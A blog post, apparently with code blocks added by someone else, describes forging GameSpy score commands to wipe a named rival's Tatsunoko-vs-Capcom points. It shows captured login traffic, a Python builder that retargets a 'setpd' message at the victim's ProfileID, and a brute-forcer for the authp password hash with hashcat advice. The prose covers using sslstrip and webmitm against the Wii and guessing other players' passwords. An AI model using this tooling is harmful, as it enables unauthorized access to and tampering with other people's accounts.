smtddr's notes

[Things I find interesting]

Punishing rage quitters in Tatsunoko-vs-Capcom

Rage Quitting (RQ) is the act of interrupting your internet connection to avoid losing points at the end of a match you didn't win. Specifically, it prevents the "setpd" command, which would subtract from your score, from ever being sent to GameSpy. There are some very infamous RQers who deserve to have their points erased.

My goal is to change their points to a value that lets them know they've been reset on purpose.

\setpd\\pid\249190728\ptype\3\dindex\kv\1\lid\length\217\data\\record\KdEh8LCzyfXX3avwYGI7Hsm_q4P+45FRFONgDJp3phZ2X4czTlsu4cc07Q95Cv3zXHz63XJHuay10auZK0UXcPlvY+_81gIe4sSG_04aZm4rMeVRdbbo31UszxtcBrV9AJxsd+diGvcjLy5qM71TpSaIyxLxJghrXp2+dLkucWWH3IaK0ZJFu3n_Ouve5UmyiD88PU6LNMagkDAq\final\

The setpd command above sets the BattlePoints for ProfileID 249190728 (my own profile) to 200.
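To make the framing of these messages concrete, here is an added example (my code, not the game's, GameSpy's or the post author's) that parses and builds messages in this `\key\value\...\final\` format, including a setpd with its raw data field. It assumes two things the capture suggests but does not spell out: that `length` is the byte count of the payload following `\data\\`, and that an empty value is written on the wire as a doubled backslash, as in `\setpd\\pid`. Several empty fields in the captures on this page (dindex, lid, port) appear with a single backslash, which this parser rejects as a missing value. The record blob used below is constructed, not the real 200-point record.

```python
"""Encode and decode the backslash-delimited key/value messages that GameSpy's
persistent-storage (gstats) service uses, e.g. \\setpd\\\\pid\\249190728...\\final\\.
Added example, not code from the game, GameSpy or the post."""
from typing import Dict, List, Tuple

FINAL = b"\\final\\"          # every message ends with this terminator
DATA_MARKER = b"\\data\\\\"   # setpd: the header stops here, raw payload follows


def parse_gs(msg: bytes) -> List[Tuple[bytes, bytes]]:
    """Split \\key\\value\\...\\final\\ into ordered (key, value) pairs.

    An empty value is a doubled backslash (\\setpd\\\\pid\\...), which a plain
    split yields as an empty element. The command word is the first key.
    Raises if the message is incomplete or a value is missing.
    """
    if not msg.startswith(b"\\") or not msg.endswith(FINAL):
        raise ValueError("not a complete GameSpy message")
    parts = msg[1:-len(FINAL)].split(b"\\")
    if len(parts) % 2:
        raise ValueError("odd number of fields: a value is missing")
    return list(zip(parts[0::2], parts[1::2]))


def is_well_formed(msg: bytes) -> bool:
    """True if parse_gs accepts the message."""
    try:
        parse_gs(msg)
        return True
    except ValueError:
        return False


def build_gs(pairs: List[Tuple[bytes, bytes]]) -> bytes:
    """Inverse of parse_gs. Values may not contain backslashes."""
    for _, v in pairs:
        if b"\\" in v:
            raise ValueError("backslash in a value would break the framing")
    return b"".join(b"\\" + k + b"\\" + v for k, v in pairs) + FINAL


def kv_record(blob: bytes) -> bytes:
    """Wrap a stats blob the way the capture does: \\record\\<blob>."""
    return build_gs([(b"record", blob)])[:-len(FINAL)]


def build_setpd(pid: int, payload: bytes, ptype: int = 3, dindex: int = 0,
                kv: int = 1, lid: int = 0) -> bytes:
    """Build a setpd: header fields, then \\data\\\\ + `length` raw bytes + \\final\\.

    ASSUMPTION: `length` is the byte count of the raw payload after \\data\\\\.
    The payload is kept raw because a kv record carries backslashes of its own.
    """
    header = [(b"setpd", b""), (b"pid", str(pid).encode()),
              (b"ptype", str(ptype).encode()), (b"dindex", str(dindex).encode()),
              (b"kv", str(kv).encode()), (b"lid", str(lid).encode()),
              (b"length", str(len(payload)).encode())]
    return build_gs(header)[:-len(FINAL)] + DATA_MARKER + payload + FINAL


def parse_setpd(msg: bytes) -> Tuple[Dict[bytes, bytes], bytes]:
    """Parse a setpd into (header dict, raw payload), checking `length`."""
    i = msg.find(DATA_MARKER)
    if i < 0:
        raise ValueError("no \\data\\\\ field")
    header = dict(parse_gs(msg[:i] + FINAL))
    length = int(header[b"length"])
    start = i + len(DATA_MARKER)
    payload = msg[start:start + length]
    if len(payload) != length or msg[start + length:] != FINAL:
        raise ValueError("length does not match the payload")
    return header, payload


def retarget(msg: bytes, new_pid: int) -> bytes:
    """The post's first attempt: the same setpd with another ProfileID."""
    header, payload = parse_setpd(msg)
    return build_setpd(new_pid, payload, ptype=int(header[b"ptype"]),
                       dindex=int(header[b"dindex"]), kv=int(header[b"kv"]),
                       lid=int(header[b"lid"]))


if __name__ == "__main__":
    blob = b"KdEh8LCzyfXX3avw"   # constructed stand-in, not the real 200-point record
    mine = build_setpd(249190728, kv_record(blob))
    print(mine)
    print(parse_setpd(retarget(mine, 264646755)))
```

`retarget(mine, 264646755)` produces exactly the message the post describes sending, and it is well-formed; the "Not Authorized" the post got back is a server-side decision about which ProfileID the session was pre-authorized for, not a framing problem the client can fix.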

A player called "THE BEST" is a habitual RQer when I fight him, and his ProfileID is 264646755. I know his ProfileID because I can read the LeaderBoard's data. At first I hoped it would be as simple as sending the same command above with my ProfileID replaced by his. That produced a "Not Authorized" error message. A closer look at the network traffic shows why:

Server: \lc\1\challenge\LWCSCQRQPX\id\1\final\

Wii: \auth\\gamename\tatvscapwii\response\922bf66e07507810b3b7584fb07336b5\port\id\1\final\

Server: \lc\2\sesskey\827445045\proof\id\1\final\

Wii: \authp\\authtoken\NDS4O9DnVeYc3SovbdoE6tcBVD8W7ZF52ZCjuWcYcv/sAcj+b3Liu4tHAW0RSwZKd9cOqZ7MNc7UrV6fC4j69IFjZA+FtZxhCP5mvydwkXYQ8fpnJXkCtKqTwDPicMFm7u2\resp\6d6fed1a4c8325f7085f83c9c2e1f17d\lid\final\

Server: \pauthr\249190728\lid\final\

Wii: [setpd command here]

Based on that server reply, I'm sure that I must supply the correct authp command before I'm given permission to edit data on a particular ProfileID. Luigi Auriemma's (Luigi.A) work revealed to me the algorithm for the first "auth" command, as well as the resp hash of the "authp" command. But he does not know where the authtoken comes from.

At this point the PokemonGTS folks have helped me again. In a much earlier blog post I mentioned seeing an SSL connection to naswii.nintendowifi.net. As it turns out, someone edited the Pokemon game's memory, making it use plain HTTP instead of SSL. The UserID and Password the game sends are right there in base64, easily decoded, and the server's response is that authtoken string. Because no player in Tatsunoko-vs-Capcom chose their own password, there is a chance that I can guess it. The password in the decrypted traffic they had turned out to be simply "571". Not a strong password at all, but Nintendo probably figured that any hacker who gets past the SSL to see the plaintext in the first place is the more serious problem.

Luigi's documentation explains that the password, as well as the sesskey, are used to generate the resp hash in the authp command, and gives the f(x) implementation for it. I've run through the numbers 0 to 999999999, comparing each resulting md5sum to the precaptured traffic of the Wii's successful login. If Luigi is correct (as he has been with everything else thus far), I am now sure the password is not a plain decimal number of at most nine digits.
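The search just described, as an added example (my code, not Luigi.A's or the post author's). Luigi's f(x) is not reproduced here: `resp_hash` is an assumed stand-in that hashes the same two inputs, password and sesskey, together, and it has to be replaced with the documented function before any result means anything. The sesskey and resp values are the ones from the capture above. The candidate generator goes beyond the post's plain 0..999999999 run by also trying zero-padded forms such as 000571, which `str(n)` never produces, so a plain-decimal search cannot rule them out.

```python
"""Brute-force the authp `resp` hash against a captured successful login.
Added example, not Luigi Auriemma's or the post author's code. The real f(x)
is in Luigi's gstats documentation and is NOT reproduced here; resp_hash is an
ASSUMED stand-in that combines the same two inputs (password and sesskey)."""
import hashlib
from typing import Callable, Iterable, Iterator, Optional, Tuple

SESSKEY = "827445045"                               # sesskey from the capture above
CAPTURED_RESP = "6d6fed1a4c8325f7085f83c9c2e1f17d"  # resp from the capture above


def resp_hash(password: str, sesskey: str) -> str:
    """ASSUMPTION: md5(password || sesskey). Swap in the documented f(x)."""
    return hashlib.md5((password + sesskey).encode("ascii")).hexdigest()


def decimal_candidates(max_digits: int) -> Iterator[str]:
    """0 .. 10**max_digits - 1 written plainly: the space the post searched."""
    for n in range(10 ** max_digits):
        yield str(n)


def padded_candidates(width: int) -> Iterator[str]:
    """Only the values that need zero-padding to reach `width` (e.g. '00571');
    str(n) never yields a leading zero, so a plain search misses all of these."""
    for n in range(10 ** (width - 1)):
        yield str(n).zfill(width)


def brute_force(target: str, sesskey: str, candidates: Iterable[str],
                f: Callable[[str, str], str] = resp_hash) -> Optional[str]:
    """Return the first candidate whose f(candidate, sesskey) matches target."""
    target = target.lower()
    for pw in candidates:
        if f(pw, sesskey) == target:
            return pw
    return None


def search_all(target: str, sesskey: str, max_digits: int,
               f: Callable[[str, str], str] = resp_hash) -> Optional[Tuple[str, str]]:
    """Plain decimals first, then zero-padded widths 2..max_digits.
    Returns (space, password), or None if every candidate misses."""
    hit = brute_force(target, sesskey, decimal_candidates(max_digits), f)
    if hit is not None:
        return ("decimal", hit)
    for width in range(2, max_digits + 1):
        hit = brute_force(target, sesskey, padded_candidates(width), f)
        if hit is not None:
            return ("padded", hit)
    return None


if __name__ == "__main__":
    # With the stand-in f(x) a miss here says nothing about the real password;
    # the run only becomes meaningful once resp_hash is the documented function.
    print(search_all(CAPTURED_RESP, SESSKEY, max_digits=6))
```

In pure Python the full 0..999999999 space costs on the order of tens of minutes per core; for a real run, split the range across processes, or, if the documented f(x) turns out to be a plain salted md5, feed the candidate generator to hashcat, which has a mode for md5 of password followed by salt.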

So, what I need now is to figure out how to see TATVSCAP's SSL traffic. I'm currently trying the Linux tool "sslstrip" to force the Wii out of SSL. I've also tried my favorite, "webmitm", a Linux tool that has helped me a couple of times in the past to see the plaintext of an otherwise secure SSL session. (sslstrip can only downgrade a client that starts on plain HTTP and follows a redirect or link to HTTPS; a client that opens the SSL connection itself is unaffected, and webmitm only works if the client accepts the forged certificate.) If I get this to work, I'll see my own password. If it turns out to be a simple number, I have a better chance of brute forcing other people's passwords. There's even the very remote chance that Nintendo has all the users on the same password, since, after all, they probably think an SSL connection is secure enough.

Looking through TvC's game memory, the string "passwd" is suspiciously missing. The User-Agent used is "RVL SDK/1.0". This matters: I have found that without the correct User-Agent, the server HTTP 302s the client to www.nintendo.com.

I don't want to mod my Wii, but one way I could definitely do this is to edit the game's ISO so it doesn't use SSL, burn it to a disc and run the bootleg on the Wii, letting me see the traffic in plaintext. That's how the Pokemon people did it and viewed the plaintext of traffic that was supposed to be in SSL.

Well, that’s it for now. Still thinking of what I can do here. ^_^;